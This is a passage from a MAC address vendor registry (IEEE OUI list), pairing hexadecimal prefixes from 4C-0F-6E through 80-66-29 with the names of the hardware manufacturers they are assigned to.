4C-0F-6E (hex) Hon Hai Precision Ind. Co.,Ltd. 4C-14-80 (hex) NOREGON SYSTEMS, INC 4C-17-EB (hex) SAGEMCOM 4C-1A-3A (hex) PRIMA Research And Production Enterprise Ltd. 4C-1F-CC (hex) HUAWEI TECHNOLOGIES CO.,LTD 4C-2C-80 (hex) Beijing Skyway Technologies Co.,Ltd 4C-2F-9D (hex) ICM Controls 4C-30-89 (hex) Thales Transportation Systems GmbH 4C-32-2D (hex) TELEDATA NETWORKS 4C-32-D9 (hex) M Rutty Holdings Pty. Ltd. 4C-39-10 (hex) Newtek Electronics co., Ltd. 4C-3B-74 (hex) VOGTEC(H.K.) Co., Ltd 4C-4B-68 (hex) Mobile Device, Inc. 4C-54-99 (hex) Huawei Device Co., Ltd 4C-55-85 (hex) Hamilton Systems 4C-5D-CD (hex) Oy Finnish Electric Vehicle Technologies Ltd 4C-5F-D2 (hex) Alcatel-Lucent 4C-60-D5 (hex) airPointe of New Hampshire 4C-63-EB (hex) Application Solutions (Electronics and Vision) Ltd 4C-73-67 (hex) Genius Bytes Software Solutions GmbH 4C-73-A5 (hex) KOVE 4C-77-4F (hex) Embedded Wireless Labs 4C-80-93 (hex) Intel Corporate 4C-8B-55 (hex) Grupo Digicon 4C-98-EF (hex) Zeo 4C-9E-80 (hex) KYOKKO ELECTRIC Co., Ltd. 4C-9E-E4 (hex) Hanyang Navicom Co.,Ltd. 4C-A7-4B (hex) Alcatel Lucent 4C-AC-0A (hex) ZTE Corporation 4C-B1-6C (hex) HUAWEI TECHNOLOGIES CO.,LTD 4C-B4-EA (hex) HRD (S) PTE., LTD. 4C-B9-C8 (hex) CONET CO., LTD. 4C-BA-A3 (hex) Bison Electronics Inc. 4C-C4-52 (hex) Shang Hai Tyd. Electon Technology Ltd. 4C-C6-02 (hex) Radios, Inc. 4C-E6-76 (hex) BUFFALO INC. 4C-EB-42 (hex) Intel Corporate 4C-ED-DE (hex) Askey Computer Corp 4C-F7-37 (hex) SamJi Electronics Co., Ltd 50-00-8C (hex) Hong Kong Telecommunications (HKT) Limited 50-0B-32 (hex) Foxda Technology Industrial(ShenZhen)Co.,LTD 50-0E-6D (hex) TrafficCast International 50-22-67 (hex) PixeLINK 50-25-2B (hex) Nethra Imaging Incorporated 50-26-90 (hex) Fujitsu Limited 50-2A-7E (hex) Smart electronic GmbH 50-2A-8B (hex) Telekom Research and Development Sdn Bhd 50-2D-A2 (hex) Intel Corporate 50-2D-F4 (hex) Phytec Messtechnik GmbH 50-3D-E5 (hex) Cisco Systems 50-56-63 (hex) Texas Instruments 50-60-28 (hex) Xirrus Inc. 50-63-13 (hex) Hon Hai Precision Ind. Co.,Ltd. 50-64-41 (hex) Greenlee 50-67-F0 (hex) ZyXEL Communications Corporation 50-6F-9A (hex) Wi-Fi Alliance 50-70-E5 (hex) He Shan World Fair Electronics Technology Limited 50-79-5B (hex) Interexport Telecomunicaciones S.A. 50-7D-02 (hex) BIODIT 50-87-B8 (hex) Nuvyyo Inc 50-8A-CB (hex) SHENZHEN MAXMADE TECHNOLOGY CO., LTD. 50-93-4F (hex) Gradual Tecnologia Ltda. 50-97-72 (hex) Westinghouse Digital 50-A6-E3 (hex) David Clark Company 50-A7-33 (hex) Ruckus Wireless 50-AF-73 (hex) Shenzhen Bitland Information Technology Co., Ltd. 50-C5-8D (hex) Juniper Networks 50-C9-71 (hex) GN Netcom A/S 50-CC-F8 (hex) Samsung Electro Mechanics 50-CE-75 (hex) Measy Electronics Ltd 50-D6-D7 (hex) Takahata Precision 50-E5-49 (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 50-EA-D6 (hex) Apple, Inc. 50-EB-1A (hex) Brocade Communications Systems, Inc 50-ED-94 (hex) Egatel SL 50-F0-03 (hex) Open Stack, Inc. 50-F6-1A (hex) Kunshan JADE Technologies co., Ltd. 50-FA-AB (hex) L-tek d.o.o. 50-FC-30 (hex) Treehouse Labs 54-03-F5 (hex) EBN Technology Corp. 54-04-96 (hex) Gigawave LTD 54-04-A6 (hex) ASUSTek COMPUTER INC. 54-05-5F (hex) Alcatel Lucent 54-1D-FB (hex) Freestyle Energy Ltd 54-20-18 (hex) Tely Labs 54-31-31 (hex) Raster Vision Ltd 54-35-DF (hex) Symeo GmbH 54-42-49 (hex) Sony Corporation 54-4A-05 (hex) wenglor sensoric gmbh 54-5F-A9 (hex) Teracom Limited 54-75-D0 (hex) Cisco Systems 54-7F-54 (hex) INGENICO 54-7F-EE (hex) Cisco Systems 54-84-7B (hex) Digital Devices GmbH 54-89-22 (hex) Zelfy Inc 54-89-98 (hex) HUAWEI TECHNOLOGIES CO.,LTD 54-92-BE (hex) Samsung Electronics Co.,Ltd 54-94-78 (hex) Silvershore Technology Partners 54-9A-16 (hex) Uzushio Electric Co.,Ltd. 54-9B-12 (hex) Samsung Electronics 54-A5-1B (hex) Huawei Device Co., Ltd 54-A9-D4 (hex) Minibar Systems 54-B6-20 (hex) SUHDOL E&C Co.Ltd. 54-CD-A7 (hex) Fujian Shenzhou Electronic Co.,Ltd 54-D0-ED (hex) AXIM Communications 54-D4-6F (hex) Cisco SPVTG 54-E6-FC (hex) TP-LINK TECHNOLOGIES CO., LTD. 54-F5-B6 (hex) ORIENTAL PACIFIC INTERNATIONAL LIMITED 54-FD-BF (hex) Scheidt & Bachmann GmbH 58-05-56 (hex) Elettronica GF S.r.L. 58-16-26 (hex) Avaya, Inc 58-17-0C (hex) Sony Ericsson Mobile Communications AB 58-1D-91 (hex) Advanced Mobile Telecom co.,ltd. 58-1F-AA (hex) Apple, Inc. 58-1F-EF (hex) Tuttnaer LTD 58-2E-FE (hex) Lighting Science Group 58-2F-42 (hex) Universal Electric Corporation 58-35-D9 (hex) Cisco Systems 58-3C-C6 (hex) Omneality Ltd. 58-42-E4 (hex) Sigma International General Medical Apparatus, LLC. 58-49-BA (hex) Chitai Electronic Corp. 58-4C-19 (hex) Chongqing Guohong Technology Development Company Limited 58-4C-EE (hex) Digital One Technologies, Limited 58-50-76 (hex) Linear Equipamentos Eletronicos SA 58-50-E6 (hex) Best Buy Corporation 58-55-CA (hex) Apple 58-57-0D (hex) Danfoss Solar Inverters 58-66-BA (hex) Hangzhou H3C Technologies Co., Limited 58-67-1A (hex) BARNES&NOBLE.COM 58-67-7F (hex) Clare Controls Inc. 58-6D-8F (hex) Cisco-Linksys, LLC 58-6E-D6 (hex) PRIVATE 58-75-21 (hex) CJSC RTSoft 58-76-75 (hex) Beijing ECHO Technologies Co.,Ltd 58-8D-09 (hex) Cisco Systems 58-91-CF (hex) Intel Corporate 58-92-0D (hex) Kinetic Avionics Limited 58-93-96 (hex) Ruckus Wireless 58-94-6B (hex) Intel Corporate 58-98-35 (hex) Technicolor 58-A7-6F (hex) iD corporation 58-B0-35 (hex) Apple, Inc 58-B0-D4 (hex) ZuniData Systems Inc. 58-B9-E1 (hex) Crystalfontz America, Inc. 58-BC-27 (hex) Cisco Systems 58-BD-A3 (hex) Nintendo Co., Ltd. 58-D0-8F (hex) IEEE 1904.1 Working Group 58-DB-8D (hex) Fast Co., Ltd. 58-E4-76 (hex) CENTRON COMMUNICATIONS TECHNOLOGIES FUJIAN CO.,LTD 58-E6-36 (hex) EVRsafe Technologies 58-E7-47 (hex) Deltanet AG 58-E8-08 (hex) AUTONICS CORPORATION 58-EE-CE (hex) Icon Time Systems 58-F6-7B (hex) Xia Men UnionCore Technology LTD. 58-F6-BF (hex) Kyoto University 58-F9-8E (hex) SECUDOS GmbH 58-FD-20 (hex) Bravida Sakerhet AB 5C-07-6F (hex) Thought Creator 5C-0C-BB (hex) CELIZION Inc. 5C-0E-8B (hex) Motorola 5C-14-37 (hex) Thyssenkrupp Aufzugswerke GmbH 5C-16-C7 (hex) Big Switch Networks 5C-17-D3 (hex) LGE 5C-18-B5 (hex) Talon Communications 5C-26-0A (hex) Dell Inc. 5C-33-8E (hex) Alpha Networkc Inc. 5C-35-3B (hex) Compal Broadband Networks Inc. 5C-35-DA (hex) There Corporation Oy 5C-40-58 (hex) Jefferson Audio Video Systems, Inc. 5C-4C-A9 (hex) Huawei Device Co., Ltd 5C-56-ED (hex) 3pleplay Electronics Private Limited 5C-57-C8 (hex) Nokia Corporation 5C-59-48 (hex) Apple 5C-5E-AB (hex) Juniper Networks 5C-63-BF (hex) TP-LINK TECHNOLOGIES CO., LTD. 5C-69-84 (hex) NUVICO 5C-6A-7D (hex) KENTKART EGE ELEKTRONIK SAN. VE TIC. LTD. STI. 5C-6B-32 (hex) Texas Instruments 5C-6D-20 (hex) Hon Hai Precision Ind. Co.,Ltd. 5C-77-57 (hex) Haivision Network Video 5C-86-4A (hex) Secret Labs LLC 5C-87-78 (hex) Cybertelbridge co.,ltd 5C-9A-D8 (hex) Fujitsu Limited 5C-AC-4C (hex) Hon Hai Precision Ind. Co.,Ltd. 5C-B5-24 (hex) Sony Ericsson Mobile Communications AB 5C-BD-9E (hex) HONGKONG MIRACLE EAGLE TECHNOLOGY(GROUP) LIMITED 5C-C2-13 (hex) Fr. Sauter AG 5C-C6-D0 (hex) Skyworth Digital technology(shenzhen)co.ltd. 5C-C9-D3 (hex) PALLADIUM ENERGY ELETRONICA DA AMAZONIA LTDA 5C-CA-32 (hex) Theben AG 5C-CE-AD (hex) CDYNE Corporation 5C-D1-35 (hex) Xtreme Power Systems 5C-D4-AB (hex) Zektor 5C-D9-98 (hex) D-Link Corporation 5C-DA-D4 (hex) Murata Manufacturing Co., Ltd. 5C-E2-23 (hex) Delphin Technology AG 5C-E2-86 (hex) Nortel Networks 5C-EB-4E (hex) R. STAHL HMI Systems GmbH 5C-F2-07 (hex) Speco Technologies 5C-F3-FC (hex) IBM Corp 5C-FF-35 (hex) Wistron Corporation 60-11-99 (hex) Data-Tester Inc. 60-12-83 (hex) Soluciones Tecnologicas para la Salud y el Bienestar SA 60-15-C7 (hex) IdaTech 60-19-0C (hex) RRAMAC 60-1D-0F (hex) Midnite Solar 60-2A-54 (hex) CardioTek B.V. 60-2A-D0 (hex) Cisco SPVTG 60-33-4B (hex) Apple 60-35-53 (hex) Buwon Technology 60-38-0E (hex) Alps Electric Co., 60-39-1F (hex) ABB Ltd 60-3F-C5 (hex) COX CO., LTD 60-52-D0 (hex) FACTS Engineering 60-54-64 (hex) Eyedro Green Solutions Inc. 60-63-FD (hex) Transcend Communication Beijing Co.,Ltd. 60-67-20 (hex) Intel Corporate 60-6B-BD (hex) Samsung Electronics Co., LTD 60-76-88 (hex) Velodyne 60-83-B2 (hex) GkWare e.K. 60-86-45 (hex) Avery Weigh-Tronix, LLC 60-89-3C (hex) Thermo Fisher Scientific P.O.A. 60-89-B7 (hex) KAEL MÜHENDISLIK ELEKTRONIK TICARET SANAYI Limited Þirketi 60-8D-17 (hex) Sentrus Government Systems Division, Inc 60-9A-A4 (hex) GVI SECURITY INC. 60-9E-64 (hex) Vivonic GmbH 60-9F-9D (hex) CloudSwitch 60-A1-0A (hex) Samsung Electronics Co.,Ltd 60-B3-C4 (hex) Elber Srl 60-B6-06 (hex) Phorus 60-C5-47 (hex) Apple, Inc. 60-C9-80 (hex) Trymus 60-D0-A9 (hex) Samsung Electronics Co.,Ltd 60-D3-0A (hex) Quatius Limited 60-D8-19 (hex) Hon Hai Precision Ind. Co.,Ltd. 60-DA-23 (hex) Estech Co.,Ltd 60-EB-69 (hex) Quanta computer Inc. 60-F1-3D (hex) JABLOCOM s.r.o. 60-F5-9C (hex) CRU-Dataport 60-F6-73 (hex) TERUMO CORPORATION 60-FA-CD (hex) Apple, Inc. 60-FB-42 (hex) Apple, Inc 64-00-F1 (hex) Cisco Systems 64-09-4C (hex) Beijing Superbee Wireless Technology Co.,Ltd 64-0E-36 (hex) TAZTAG 64-0F-28 (hex) 2wire 64-10-84 (hex) HEXIUM Technical Development Co., Ltd. 64-16-8D (hex) Cisco Systems 64-16-F0 (hex) Shehzhen Huawei Communication Technologies Co., Ltd. 64-1A-22 (hex) Heliospectra/Woodhill Investments 64-1E-81 (hex) Dowslake Microsystems 64-27-37 (hex) Hon Hai Precision Ind. Co.,Ltd. 64-31-50 (hex) Hewlett-Packard Company 64-31-7E (hex) Dexin Corporation 64-34-09 (hex) BITwave Pte Ltd 64-43-46 (hex) GuangDong Quick Network Computer CO.,LTD 64-4B-C3 (hex) Shanghai WOASiS Telecommunications Ltd., Co. 64-4B-F0 (hex) CalDigit, Inc 64-4D-70 (hex) dSPACE GmbH 64-4F-74 (hex) LENUS Co., Ltd. 64-52-99 (hex) Chamberlain 64-54-22 (hex) Equinox Payments 64-55-63 (hex) Intelight Inc. 64-55-7F (hex) NSFOCUS Information Technology Co., Ltd. 64-5D-D7 (hex) Shenzhen Lifesense Medical Electronics Co., Ltd. 64-65-C0 (hex) Nuvon, Inc 64-67-07 (hex) Beijing Omnific Technology, Ltd. 64-68-0C (hex) COMTREND 64-69-BC (hex) Hytera Communications Co .,ltd 64-6E-6C (hex) Radio Datacom LLC 64-73-E2 (hex) Arbiter Systems, Inc. 64-7B-D4 (hex) Texas Instruments 64-7D-81 (hex) YOKOTA INDUSTRIAL CO,.LTD 64-7F-DA (hex) TEKTELIC Communications Inc. 64-80-8B (hex) VG Controls, Inc. 64-80-99 (hex) Intel Corporation 64-81-25 (hex) Alphatron Marine BV 64-87-88 (hex) Juniper Networks 64-87-D7 (hex) PIRELLI BROADBAND SOLUTIONS 64-99-5D (hex) LGE 64-9B-24 (hex) V Technology Co., Ltd. 64-9C-8E (hex) Texas Instruments 64-9E-F3 (hex) Cisco Systems 64-A0-E7 (hex) Cisco Systems 64-A2-32 (hex) OOO Samlight 64-A7-69 (hex) HTC Corporation 64-A8-37 (hex) Juni Korea Co., Ltd 64-AE-0C (hex) Cisco Systems 64-B6-4A (hex) ViVOtech, Inc. 64-B9-E8 (hex) Apple, Inc 64-BC-11 (hex) CombiQ AB 64-C5-AA (hex) South African Broadcasting Corporation 64-C6-AF (hex) AXERRA Networks Ltd 64-D0-2D (hex) DRAYTEK FRANCE 64-D1-A3 (hex) Sitecom Europe BV 64-D2-41 (hex) Keith & Koep GmbH 64-D4-DA (hex) Intel Corporate 64-D9-12 (hex) Solidica, Inc. 64-D9-89 (hex) Cisco Systems 64-DB-18 (hex) OpenPattern 64-DC-01 (hex) Static Systems Group PLC 64-DE-1C (hex) Kingnetic Pte Ltd 64-E1-61 (hex) DEP Corp. 64-E8-4F (hex) Serialway Communication Technology Co. Ltd 64-E8-E6 (hex) global moisture management system 64-ED-57 (hex) Motorola Mobility, Inc. 64-ED-62 (hex) WOORI SYSTEMS Co., Ltd 64-F9-70 (hex) Kenade Electronics Technology Co.,LTD. 64-F9-87 (hex) Avvasi Inc. 64-FC-8C (hex) Zonar Systems 68-05-CA (hex) Intel Corporation 68-09-27 (hex) Apple, Inc. 68-12-2D (hex) Special Instrument Development Co., Ltd. 68-1A-B2 (hex) zte corporation 68-1F-D8 (hex) Advanced Telemetry 68-23-4B (hex) Nihon Dengyo Kousaku 68-43-52 (hex) Bhuu Limited 68-4B-88 (hex) Galtronics Telemetry Inc. 68-54-F5 (hex) enLighted Inc 68-59-7F (hex) Alcatel Lucent 68-5B-36 (hex) POWERTECH INDUSTRIAL CO., LTD. 68-5D-43 (hex) Intel Corporate 68-5E-6B (hex) PowerRay Co., Ltd. 68-63-59 (hex) Advanced Digital Broadcast SA 68-6E-23 (hex) Wi3 Inc 68-78-4C (hex) Nortel Networks 68-79-24 (hex) ELS-GmbH & Co. KG 68-79-ED (hex) SHARP Corporation 68-7F-74 (hex) Cisco-Linksys, LLC 68-84-70 (hex) eSSys Co.,Ltd 68-85-40 (hex) IGI Mobile, Inc. 68-87-6B (hex) INQ Mobile Limited 68-92-34 (hex) Ruckus Wireless 68-97-4B (hex) Shenzhen Costar Electronics Co. Ltd. 68-A1-B7 (hex) Honghao Mingchuan Technology (Beijing) CO.,Ltd. 68-A3-C4 (hex) Liteon Technology Corporation 68-A8-6D (hex) Apple, Inc. 68-AA-D2 (hex) DATECS LTD., 68-B5-99 (hex) Hewlett-Packard Company 68-BC-0C (hex) Cisco Systems 68-BD-AB (hex) Cisco Systems 68-CA-00 (hex) Octopus Systems Limited 68-CC-9C (hex) Mine Site Technologies 68-CD-0F (hex) U Tek Company Limited 68-DB-96 (hex) OPWILL Technologies CO .,LTD 68-DC-E8 (hex) PacketStorm Communications 68-E4-1F (hex) Unglaube Identech GmbH 68-EB-AE (hex) Samsung Electronics Co.,Ltd 68-EB-C5 (hex) Angstrem Telecom 68-ED-43 (hex) Research In Motion 68-EF-BD (hex) Cisco Systems 68-F1-25 (hex) Data Controls Inc. 68-F8-95 (hex) Redflow Limited 6C-04-60 (hex) RBH Access Technologies Inc. 6C-0E-0D (hex) Sony Ericsson Mobile Communications AB 6C-0F-6A (hex) JDC Tech Co., Ltd. 6C-18-11 (hex) Decatur Electronics 6C-22-AB (hex) Ainsworth Game Technology 6C-23-B9 (hex) Sony Ericsson Mobile Communications AB 6C-2E-33 (hex) Accelink Technologies Co.,Ltd. 6C-2E-85 (hex) SAGEMCOM 6C-32-DE (hex) Indieon Technologies Pvt. Ltd. 6C-33-A9 (hex) Magicjack LP 6C-39-1D (hex) Beijing ZhongHuaHun Network Information center 6C-3E-9C (hex) KE Knestel Elektronik GmbH 6C-50-4D (hex) Cisco Systems 6C-5C-DE (hex) SunReports, Inc. 6C-5D-63 (hex) ShenZhen Rapoo Technology Co., Ltd. 6C-5E-7A (hex) Ubiquitous Internet Telecom Co., Ltd 6C-62-6D (hex) Micro-Star INT'L CO., LTD 6C-6F-18 (hex) Stereotaxis, Inc. 6C-70-39 (hex) Novar GmbH 6C-81-FE (hex) Mitsuba Corporation 6C-8C-DB (hex) Otus Technologies Ltd 6C-8D-65 (hex) Wireless Glue Networks, Inc. 6C-92-BF (hex) Inspur Electronic Information Industry Co.,Ltd. 6C-9B-02 (hex) Nokia Corporation 6C-9C-E9 (hex) Nimble Storage 6C-9C-ED (hex) Cisco Systems 6C-A6-82 (hex) EDAM information & communications 6C-A7-80 (hex) Nokia Corporation 6C-A9-06 (hex) Telefield Ltd 6C-AB-4D (hex) Digital Payment Technologies 6C-AC-60 (hex) Venetex Corp 6C-AD-3F (hex) Hubbell Building Automation, Inc. 6C-BE-E9 (hex) Alcatel-Lucent-IPD 6C-C1-D2 (hex) Motorola Mobility, Inc. 6C-D6-8A (hex) LG Electronics Inc 6C-DC-6A (hex) Promethean Limited 6C-E0-B0 (hex) SOUND4 6C-E9-07 (hex) Nokia Corporation 6C-F0-49 (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 6C-F3-7F (hex) Aruba Networks 6C-FD-B9 (hex) Proware Technologies Co Ltd. 6C-FF-BE (hex) MPB Communications Inc. 70-02-58 (hex) 01DB-METRAVIB 70-05-14 (hex) LG Electronics 70-14-04 (hex) Limited Liability Company "Research Center "Bresler" 70-1A-04 (hex) Liteon Tech Corp. 70-1A-ED (hex) ADVAS CO., LTD. 70-2B-1D (hex) E-Domus International Limited 70-2F-97 (hex) Aava Mobile Oy 70-31-87 (hex) ACX GmbH 70-32-D5 (hex) Athena Wireless Communications Inc 70-38-EE (hex) Avaya Inc 70-3A-D8 (hex) Shenzhen Afoundry Electronic Co., Ltd 70-3C-39 (hex) SEAWING Kft 70-41-B7 (hex) Edwards Lifesciences LLC 70-46-42 (hex) CHYNG HONG ELECTRONIC CO., LTD. 70-4A-AE (hex) Xstream Flow (Pty) Ltd 70-58-12 (hex) Panasonic AVC Networks Company 70-5A-B6 (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD. 70-5C-AD (hex) Konami Gaming Inc 70-5E-AA (hex) Action Target, Inc. 70-64-17 (hex) ORBIS TECNOLOGIA ELECTRICA S.A. 70-65-82 (hex) Suzhou Hanming Technologies Co., Ltd. 70-6F-81 (hex) PRIVATE 70-70-4C (hex) Purple Communications, Inc 70-71-BC (hex) PEGATRON CORPORATION 70-72-CF (hex) EdgeCore Networks 70-73-CB (hex) Apple, Inc. 70-76-F0 (hex) LevelOne Communications (India) Private Limited 70-7B-E8 (hex) HUAWEI TECHNOLOGIES CO.,LTD 70-7E-43 (hex) Motorola Mobility, Inc. 70-7E-DE (hex) NASTEC LTD. 70-81-05 (hex) Cisco Systems 70-82-8E (hex) OleumTech Corporation 70-8B-78 (hex) citygrow technology co., ltd 70-97-56 (hex) Happyelectronics Co.,Ltd 70-A1-91 (hex) Trendsetter Medical, LLC 70-A4-1C (hex) Advanced Wireless Dynamics S.L. 70-A6-6A (hex) Prox Dynamics AS 70-B0-35 (hex) Shenzhen Zowee Technology Co., Ltd 70-B0-8C (hex) Shenou Communication Equipment Co.,Ltd 70-B2-65 (hex) Hiltron s.r.l. 70-B9-21 (hex) FiberHome Telecommunication Technologies CO.,LTD 70-CA-9B (hex) Cisco Systems 70-CD-60 (hex) Apple Inc 70-D4-F2 (hex) RIM 70-D5-7E (hex) Scalar Corporation 70-D5-E7 (hex) Wellcore Corporation 70-D6-B6 (hex) Metrum Technologies 70-D8-80 (hex) Upos System sp. z o.o. 70-DD-A1 (hex) Tellabs 70-DE-E2 (hex) Apple, Inc. 70-E1-39 (hex) 3view Ltd 70-E8-43 (hex) Beijing C&W Optical Communication Technology Co.,Ltd. 70-EE-50 (hex) Netatmo 70-F1-A1 (hex) Liteon Technology Corporation 70-F3-95 (hex) Universal Global Scientific Industrial Co., Ltd. 74-0A-BC (hex) JSJS Designs (Europe) Limited 74-15-E2 (hex) Tri-Sen Systems Corporation 74-2B-0F (hex) Infinidat Ltd. 74-2F-68 (hex) Azurewave Technologies, Inc. 74-31-70 (hex) Arcadyan Technology Corporation 74-32-56 (hex) NT-ware Systemprg GmbH 74-38-89 (hex) ANNAX Anzeigesysteme GmbH 74-44-01 (hex) NETGEAR 74-56-12 (hex) Motorola Mobility, Inc. 74-5E-1C (hex) PIONEER CORPORATION 74-63-DF (hex) VTS GmbH 74-65-D1 (hex) Atlinks 74-6B-82 (hex) MOVEK 74-72-F2 (hex) Chipsip Technology Co., Ltd. 74-78-18 (hex) ServiceAssure 74-7D-B6 (hex) Aliwei Communications, Inc 74-7E-1A (hex) Red Embedded Design Limited 74-8E-F8 (hex) Brocade Communications Systems, Inc. 74-90-50 (hex) Renesas Electronics Corporation 74-91-1A (hex) Ruckus Wireless 74-A4-A7 (hex) QRS Music Technologies, Inc. 74-A7-22 (hex) LG Electronics 74-B0-0C (hex) Network Video Technologies, Inc 74-B9-EB (hex) Fujian JinQianMao Electronic Technology Co.,Ltd 74-BE-08 (hex) ATEK Products, LLC 74-CD-0C (hex) Smith Myers Communications Ltd. 74-CE-56 (hex) Packet Force Technology Limited Company 74-D0-DC (hex) ERICSSON AB 74-D6-75 (hex) WYMA Tecnologia 74-D8-50 (hex) Evrisko Systems 74-DE-2B (hex) Liteon Technology Corporation 74-E0-6E (hex) Ergophone GmbH 74-E5-0B (hex) Intel Corporate 74-E5-37 (hex) RADSPIN 74-E7-C6 (hex) Motorola Mobility, Inc. 74-EA-3A (hex) TP-LINK Technologies Co.,Ltd. 74-F0-6D (hex) AzureWave Technologies, Inc. 74-F0-7D (hex) BnCOM Co.,Ltd 74-F6-12 (hex) Motorola Mobility, Inc. 74-F7-26 (hex) Neuron Robotics 74-FD-A0 (hex) Compupal (Group) Corporation 78-02-8F (hex) Adaptive Spectrum and Signal Alignment (ASSIA), Inc. 78-07-38 (hex) Z.U.K. Elzab S.A. 78-11-85 (hex) NBS Payment Solutions Inc. 78-12-B8 (hex) ORANTEK LIMITED 78-19-2E (hex) NASCENT Technology 78-19-F7 (hex) Juniper Networks 78-1D-BA (hex) HUAWEI TECHNOLOGIES CO.,LTD 78-1D-FD (hex) Jabil Inc 78-22-3D (hex) Affirmed Networks 78-25-AD (hex) SAMSUNG ELECTRONICS CO., LTD. 78-2B-CB (hex) Dell Inc 78-2E-EF (hex) Nokia Corporation 78-30-E1 (hex) UltraClenz, LLC 78-3F-15 (hex) EasySYNC Ltd. 78-44-76 (hex) Zioncom technology co.,ltd 78-47-1D (hex) Samsung Electronics Co.,Ltd 78-51-0C (hex) LiveU Ltd. 78-57-12 (hex) Mobile Integration Workgroup 78-59-3E (hex) RAFI GmbH & Co.KG 78-5C-72 (hex) Hioso Technology Co., Ltd. 78-66-AE (hex) ZTEC Instruments, Inc. 78-7F-62 (hex) GiK mbH 78-81-8F (hex) Server Racks Australia Pty Ltd 78-84-3C (hex) Sony Corporation 78-84-EE (hex) INDRA ESPACIO S.A. 78-89-73 (hex) CMC 78-8C-54 (hex) Enkom Technologies Ltd. 78-92-9C (hex) Intel Corporate 78-99-8F (hex) MEDILINE ITALIA SRL 78-A0-51 (hex) iiNet Labs Pty Ltd 78-A2-A0 (hex) Nintendo Co., Ltd. 78-A3-E4 (hex) Apple, Inc. 78-A5-DD (hex) Shenzhen Smarteye Digital Electronics Co., Ltd 78-A6-83 (hex) Precidata 78-A6-BD (hex) DAEYEON Control&Instrument Co,.Ltd 78-A7-14 (hex) Amphenol 78-AC-C0 (hex) Hewlett-Packard Company 78-B6-C1 (hex) AOBO Telecom Co.,Ltd 78-B8-1A (hex) INTER SALES A/S 78-BA-D0 (hex) Shinybow Technology Co. Ltd. 78-BE-B6 (hex) Enhanced Vision 78-C4-0E (hex) H&D Wireless 78-C6-BB (hex) Innovasic, Inc. 78-CA-04 (hex) Nokia Corporation 78-CA-39 (hex) Apple 78-CD-8E (hex) SMC Networks Inc 78-D0-04 (hex) Neousys Technology Inc. 78-D6-F0 (hex) Samsung Electro Mechanics 78-DD-08 (hex) Hon Hai Precision Ind. Co.,Ltd. 78-DD-D6 (hex) c-scape 78-DE-E4 (hex) Texas Instruments 78-E3-B5 (hex) Hewlett-Packard Company 78-E4-00 (hex) Hon Hai Precision Ind. Co.,Ltd. 78-E7-D1 (hex) Hewlett-Packard Company 78-EC-22 (hex) Shanghai Qihui Telecom Technology Co., LTD 78-EF-4C (hex) Unetconvergence Co., Ltd. 78-F7-D0 (hex) Silverbrook Research 78-FE-3D (hex) Juniper Networks 7C-03-4C (hex) SAGEMCOM 7C-05-1E (hex) RAFAEL LTD. 7C-08-D9 (hex) Shanghai Engineering Research Center for Broadband Technologies and Applications 7C-11-BE (hex) Apple, Inc. 7C-14-76 (hex) Damall Technologies S.A.S. Di Ludovic Anselme Glaglanon & C. 7C-1E-52 (hex) Microsoft 7C-1E-B3 (hex) 2N TELEKOMUNIKACE a.s. 7C-20-64 (hex) Alcatel Lucent IPD 7C-2C-F3 (hex) Secure Electrans Ltd 7C-2E-0D (hex) Blackmagic Design 7C-2F-80 (hex) Gigaset Communications GmbH 7C-33-6E (hex) MEG Electronics Inc. 7C-39-20 (hex) SSOMA SECURITY 7C-3B-D5 (hex) Imago Group 7C-3E-9D (hex) PATECH 7C-4A-82 (hex) Portsmith LLC 7C-4A-A8 (hex) MindTree Wireless PVT Ltd 7C-4B-78 (hex) Red Sun Synthesis Pte Ltd 7C-4C-58 (hex) Scale Computing, Inc. 7C-4C-A5 (hex) BSkyB Ltd 7C-4F-B5 (hex) Arcadyan Technology Corporation 7C-55-E7 (hex) YSI, Inc. 7C-61-93 (hex) HTC Corporation 7C-6A-DB (hex) SafeTone Technology Co.,Ltd 7C-6B-33 (hex) Tenyu Tech Co. Ltd. 7C-6B-52 (hex) Tigaro Wireless 7C-6C-39 (hex) PIXSYS SRL 7C-6C-8F (hex) AMS NEVE LTD 7C-6D-62 (hex) Apple, Inc 7C-6F-06 (hex) Caterpillar Trimble Control Technologies 7C-76-73 (hex) ENMAS GmbH 7C-7B-E4 (hex) Z'SEDAI KENKYUSHO CORPORATION 7C-7D-41 (hex) Jinmuyu Electronics Co., Ltd. 7C-8E-E4 (hex) Texas Instruments 7C-A2-9B (hex) D.SignT GmbH & Co. KG 7C-A6-1D (hex) MHL, LLC 7C-B5-42 (hex) ACES Technology 7C-BB-6F (hex) Cosco Electronics Co., Ltd. 7C-C3-A1 (hex) Apple, Inc. 7C-C5-37 (hex) Apple 7C-C8-D7 (hex) Damalisk 7C-CB-0D (hex) Aaxeon Technologies Inc. 7C-CF-CF (hex) Shanghai SEARI Intelligent System Co., Ltd 7C-DA-84 (hex) Dongnian Networks Inc. 7C-DD-11 (hex) Chongqing MAS SCI&TECH.Co.,Ltd 7C-DD-20 (hex) IOXOS Technologies S.A. 7C-DD-90 (hex) Shenzhen Ogemray Technology Co., Ltd. 7C-E0-44 (hex) NEON Inc 7C-E9-D3 (hex) Hon Hai Precision Ind. Co.,Ltd. 7C-ED-8D (hex) MICROSOFT 7C-EF-18 (hex) Creative Product Design Pty. Ltd. 7C-F0-5F (hex) Apple Inc 7C-F0-98 (hex) Bee Beans Technologies, Inc. 7C-F0-BA (hex) Linkwell Telesystems Pvt Ltd 7C-F4-29 (hex) NUUO Inc. 80-00-10 (hex) ATT BELL LABORATORIES 80-14-40 (hex) Sunlit System Technology Corp 80-17-7D (hex) Nortel Networks 80-1F-02 (hex) Edimax Technology Co. Ltd. 80-22-75 (hex) Beijing Beny Wave Technology Co Ltd 80-2D-E1 (hex) Solarbridge Technologies 80-2E-14 (hex) azeti Networks AG 80-34-57 (hex) OT Systems Limited 80-38-FD (hex) LeapFrog Enterprises, Inc. 80-39-E5 (hex) PATLITE CORPORATION 80-3B-9A (hex) ghe-ces electronic ag 80-3F-5D (hex) Winstars Technology Ltd 80-42-7C (hex) Adolf Tedsen GmbH & Co. KG 80-47-31 (hex) Packet Design, Inc. 80-4F-58 (hex) ThinkEco, Inc. 80-50-1B (hex) Nokia Corporation 80-58-C5 (hex) NovaTec Kommunikationstechnik GmbH 80-60-07 (hex) RIM 80-64-59 (hex) Nimbus Inc. 80-65-E9 (hex) BenQ Corporation 80-66-29 (hex) Prescope Technologies 